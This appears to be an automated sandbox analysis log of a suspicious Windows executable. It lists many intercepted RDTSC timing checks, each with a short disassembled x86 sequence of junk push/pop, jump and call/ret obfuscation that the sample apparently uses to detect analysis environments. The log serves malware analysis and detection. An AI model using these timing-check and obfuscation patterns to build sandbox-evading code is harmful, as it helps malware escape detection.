Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD109A second address: CD10C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d jmp 00007FCBA141FCABh 0x00000012 pop ecx 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 js 00007FCBA141FCACh 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C9474F second address: C94770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FCBA141C937h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD68E6 second address: CD68EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD68EA second address: CD6904 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA141C931h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD9EB7 second address: CD9EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDA563 second address: CDA571 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FCBA141C926h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDAE4C second address: CDAE52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDAE52 second address: CDAE58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDAE58 second address: CDAE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDB4E6 second address: CDB503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDB503 second address: CDB508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDB508 second address: CDB51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jne 00007FCBA141C926h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDBEE8 second address: CDBFA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FCBA141FCACh 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FCBA141FCB2h 0x00000016 nop 0x00000017 mov esi, ebx 0x00000019 jmp 00007FCBA141FCB7h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 call 00007FCBA141FCA8h 0x00000028 pop esi 0x00000029 mov dword ptr [esp+04h], esi 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc esi 0x00000036 push esi 0x00000037 ret 0x00000038 pop esi 0x00000039 ret 0x0000003a sub dword ptr [ebp+122D1B7Ah], edi 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007FCBA141FCA8h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c pushad 0x0000005d mov si, 9614h 0x00000061 mov eax, esi 0x00000063 popad 0x00000064 xchg eax, ebx 0x00000065 pushad 0x00000066 jmp 00007FCBA141FCB5h 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDBDC0 second address: CDBDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDBDC5 second address: CDBDCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDD15F second address: CDD169 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBA141C926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDDB52 second address: CDDB56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDDB56 second address: CDDB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a add di, 9071h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 or esi, dword ptr [ebp+122D26B4h] 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b jnl 00007FCBA141C928h 0x00000021 jl 00007FCBA141C928h 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push esi 0x0000002e jnp 00007FCBA141C926h 0x00000034 pop esi 0x00000035 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDE5B5 second address: CDE5C7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA141FCA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDE5C7 second address: CDE5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FCBA141C926h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDF019 second address: CDF03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnl 00007FCBA141FCA8h 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FCBA141FCB1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDF03D second address: CDF043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CDF043 second address: CDF047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CE0638 second address: CE063C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CE3CBC second address: CE3CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CE041E second address: CE0422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CE4D3D second address: CE4D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBA141FCA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CE5C5C second address: CE5C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CE7A8D second address: CE7A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CE7A91 second address: CE7A97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CE8AA4 second address: CE8B40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FCBA141FCAFh 0x0000000f nop 0x00000010 movsx ebx, si 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FCBA141FCA8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f adc edi, 4B971600h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007FCBA141FCA8h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 sub di, CDCBh 0x00000056 push eax 0x00000057 jp 00007FCBA141FCC9h 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FCBA141FCB7h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CE5DCC second address: CE5DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007FCBA141C926h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FCBA141C92Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEAC29 second address: CEAC33 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA141FCA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEAC33 second address: CEAC3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEAC3A second address: CEAC4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 js 00007FCBA141FCB0h 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEAC4D second address: CEACB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 sbb di, 5912h 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FCBA141C928h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D242Dh], ebx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007FCBA141C928h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FCBA141C931h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEBC7F second address: CEBC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEBC83 second address: CEBC89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEBC89 second address: CEBD2A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007FCBA141FCA6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FCBA141FCA8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push eax 0x00000028 mov bx, 5107h 0x0000002c pop edi 0x0000002d call 00007FCBA141FCB5h 0x00000032 jno 00007FCBA141FCACh 0x00000038 pop ebx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007FCBA141FCA8h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 push 00000000h 0x00000057 sub bl, FFFFFFE1h 0x0000005a xchg eax, esi 0x0000005b jmp 00007FCBA141FCB8h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jp 00007FCBA141FCA6h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEBD2A second address: CEBD30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CECC3B second address: CECCB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007FCBA141FCB2h 0x0000000b nop 0x0000000c add dword ptr [ebp+1244CE7Eh], esi 0x00000012 movsx edi, ax 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FCBA141FCA8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 sub ebx, dword ptr [ebp+122D2BA0h] 0x00000037 push 00000000h 0x00000039 mov edi, ecx 0x0000003b xchg eax, esi 0x0000003c jmp 00007FCBA141FCB9h 0x00000041 push eax 0x00000042 push ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 ja 00007FCBA141FCA6h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEECD1 second address: CEED3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007FCBA141C92Dh 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FCBA141C928h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 sbb bh, 00000061h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FCBA141C928h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 push 00000000h 0x00000047 mov ebx, dword ptr [ebp+122D2A7Ch] 0x0000004d xchg eax, esi 0x0000004e pushad 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 push eax 0x00000053 pop eax 0x00000054 popad 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEED3C second address: CEED40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEED40 second address: CEED44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEDE34 second address: CEDE3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CECECB second address: CECECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEBE4C second address: CEBEEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FCBA141FCA8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007FCBA141FCA8h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 and edi, dword ptr [ebp+122D2EE6h] 0x0000004d mov dword ptr fs:[00000000h], esp 0x00000054 mov edi, dword ptr [ebp+122D2990h] 0x0000005a mov eax, dword ptr [ebp+122D10ADh] 0x00000060 mov edi, dword ptr [ebp+122D2E18h] 0x00000066 push FFFFFFFFh 0x00000068 mov bl, D4h 0x0000006a nop 0x0000006b jmp 00007FCBA141FCB8h 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 jnp 00007FCBA141FCA6h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CECECF second address: CECED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEBEEA second address: CEBEF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEDEE6 second address: CEDEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEEFE0 second address: CEEFE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEFD20 second address: CEFD24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CEEFE6 second address: CEEFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CF0E02 second address: CF0E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FCBA141C928h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CF2046 second address: CF204B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CF2151 second address: CF2156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CF2156 second address: CF215B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CFB26E second address: CFB274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CFB274 second address: CFB27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CFB27A second address: CFB27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CFB4E4 second address: CFB4EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FCBA141FCA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CFB4EF second address: CFB4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D05D21 second address: D05D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCBA141FCA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D063EE second address: D06412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FCBA141C938h 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D06AFD second address: D06B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D06DAB second address: D06DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FCBA141C926h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D06DB7 second address: D06DFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCBA141FCAAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jne 00007FCBA141FCA6h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FCBA141FCB4h 0x0000001d jmp 00007FCBA141FCB2h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D06DFB second address: D06E11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D06E11 second address: D06E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C92BE8 second address: C92BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B2A3 second address: D0B2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FCBA141FCB8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B2C2 second address: D0B2C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B2C8 second address: D0B2CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B410 second address: D0B424 instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA141C926h 0x00000008 jo 00007FCBA141C926h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B5AD second address: D0B5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B5B8 second address: D0B5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jno 00007FCBA141C92Ch 0x0000000d rdtsc
